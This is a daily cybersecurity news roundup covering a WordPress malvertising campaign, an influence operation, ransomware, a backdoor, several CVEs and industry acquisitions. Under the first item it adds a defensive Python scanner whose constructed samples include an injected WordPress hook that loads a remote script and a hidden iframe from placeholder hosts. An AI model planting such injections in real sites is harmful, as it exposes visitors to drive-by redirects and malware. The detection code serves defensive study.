
Daily Cybersecurity Roundup, October 06, 2025

From digital deception to hidden backdoors, attackers are getting bolder and smarter in how they blend manipulation with malware. A malvertising campaign stealthily embedded malicious JavaScript inside small theme-level tweaks on WordPress sites, loading remote ad/redirect scripts that turned at least 17 sites into drive-by redirect hubs and hidden-iframe distributors. At the same time, a coordinated influence operation labeled PRISONBREAK deployed dozens of AI-generated images and videos to target Iranian audiences around the June Evin Prison strikes. Meanwhile, defenders are also tracking WARMCOOKIE (aka BadSpace), a backdoor that has been steadily upgraded with new tooling to preserve persistent access and stage secondary payloads. Read further for more cybersecurity news from the weekend.

01. A malvertising campaign hid malicious JavaScript inside small theme-level modifications on WordPress sites to load remote ad/redirect scripts, infecting visitors across at least 17 sites and enabling drive-by redirects and hidden iframes.
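The item above describes injected theme code that pulls in remote ad/redirect scripts and hidden iframes. The following is an added example (not code from the roundup or from any of the reports it summarizes) of a defender-side scanner that walks theme files line by line and flags script or iframe tags whose `src` points off-site, plus dynamically created `<script>` elements whose `.src` is assigned a remote URL. The sample `functions.php` and theme JavaScript are constructed for the example, and every hostname in them is an invented placeholder; the allowlist of trusted hosts is an assumed input the operator would tailor to their site.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample: a WordPress theme functions.php with one legitimate
# enqueue and one injected wp_head hook. Hostnames are invented placeholders.
SAMPLE_FUNCTIONS_PHP = r"""<?php
function theme_setup() {
    add_theme_support('title-tag');
}
add_action('after_setup_theme', 'theme_setup');

// legitimate: the theme's own script, relative to the theme directory
function theme_scripts() {
    wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js');
}
add_action('wp_enqueue_scripts', 'theme_scripts');

// injected: remote loader and hidden iframe echoed into every page head
function _x1() {
    echo '<script src="https://ads-loader.invalid/js/loader.js"></script>';
    echo '<iframe src="https://redirect-hub.invalid/land" style="display:none;width:0;height:0"></iframe>';
}
add_action('wp_head', '_x1');
"""

# Constructed sample: a theme JavaScript file that creates a script element
# at runtime and points it at a remote host (also an invented placeholder).
SAMPLE_THEME_JS = r"""document.addEventListener('DOMContentLoaded', function () {
  var s = document.createElement('script');
  s.src = 'https://cdn.redirect-hub.invalid/r.js';
  document.head.appendChild(s);
});
"""

# One opening <script ...> or <iframe ...> tag (closing tags do not match).
TAG = re.compile(r"<(script|iframe)\b[^>]*>", re.I)
# The src attribute inside a matched tag.
SRC_ATTR = re.compile(r"\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Inline styles commonly used to make an iframe invisible.
HIDDEN = re.compile(r"display\s*:\s*none|width\s*:\s*0|height\s*:\s*0|visibility\s*:\s*hidden", re.I)
# Runtime assignment of a remote (absolute or protocol-relative) URL to .src.
DYNAMIC_SRC = re.compile(r"\.src\s*=\s*['\"]((?:https?:)?//[^'\"]+)['\"]", re.I)


@dataclass
class Finding:
    kind: str   # remote-script | dynamic-script | hidden-iframe | remote-iframe
    url: str
    line: int


def is_external(url: str, allowed_hosts) -> bool:
    """True when the URL names a host that is not on the allowlist.
    Relative paths (no host) are the theme's own assets and are ignored."""
    host = urlparse(url).hostname
    return host is not None and host.lower() not in allowed_hosts


def scan_theme_file(text: str, allowed_hosts=frozenset()):
    """Return Findings for every off-site script/iframe load in one theme file."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for tag in TAG.finditer(line):
            src = SRC_ATTR.search(tag.group(0))
            if not src or not is_external(src.group(1), allowed):
                continue
            if tag.group(1).lower() == "script":
                findings.append(Finding("remote-script", src.group(1), lineno))
            else:
                kind = "hidden-iframe" if HIDDEN.search(tag.group(0)) else "remote-iframe"
                findings.append(Finding(kind, src.group(1), lineno))
        for m in DYNAMIC_SRC.finditer(line):
            if is_external(m.group(1), allowed):
                findings.append(Finding("dynamic-script", m.group(1), lineno))
    return findings


if __name__ == "__main__":
    # "example.com" stands in for the site's own trusted CDN or domain.
    for name, text in (("functions.php", SAMPLE_FUNCTIONS_PHP), ("theme.js", SAMPLE_THEME_JS)):
        for f in scan_theme_file(text, {"example.com"}):
            print(f"{name}:{f.line}: {f.kind} -> {f.url}")
```

In practice the scanner would be run over every file under `wp-content/themes/` (and compared against a clean copy of the theme from its vendor), with the allowlist populated from the site's own domains and CDN; anything it reports that is not on that list is a candidate for the kind of theme-level injection the item describes. The `hidden-iframe` classification is a heuristic on inline styles, so a reviewer should still read the surrounding code rather than rely on the label alone.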

02. A coordinated influence operation, PRISONBREAK, used dozens of AI-generated images and videos and targeted Iranian audiences around the June strikes on Evin Prison — activity the researchers say was likely run by or on behalf of Israeli government actors or contractors.

03. Yurei, a new Go-based ransomware family, uses per-file ChaCha20 keys wrapped with ECIES, disables backups and volume shadow copies, wipes logs, and spreads via SMB, removable drives, and credential-based remote execution targeting Windows systems.

04. The WARMCOOKIE backdoor (aka BadSpace) has evolved with new features in the tooling used by threat actors to maintain persistent backdoor access and stage follow-on payloads.

05. Researchers reverse-engineered Asgard Protector, a premium, customizable crypter offering IP logging, anti-VM checks, autorun, and other evasion features, revealing advanced techniques used to hide malware from antivirus detection.

06. Attackers exploited a Zimbra Collaboration Suite XSS vulnerability in iCalendar files (tracked as CVE-2025-27915) in zero-day attacks earlier this year that targeted at least one Brazilian military organization via a spoofed Libyan Navy email.

07. QNAP disclosed a NetBak Replicator flaw tracked as CVE-2025-57714, affecting NetBak Replicator 4.5.x, that could allow local attackers to execute unauthorized code.

08. A critical use-after-free vulnerability (CVE-2025-49844) in Redis’s Lua scripting subsystem could enable authenticated attackers to achieve remote code execution.

09. Dublin-based security-first MSP Ekco has acquired UK managed services provider Solsoft Group; the price was not publicly disclosed.

10. An AI-driven detection and response company, Vectra AI, has acquired Netography, a cloud-native network observability firm; the deal terms have not been disclosed.
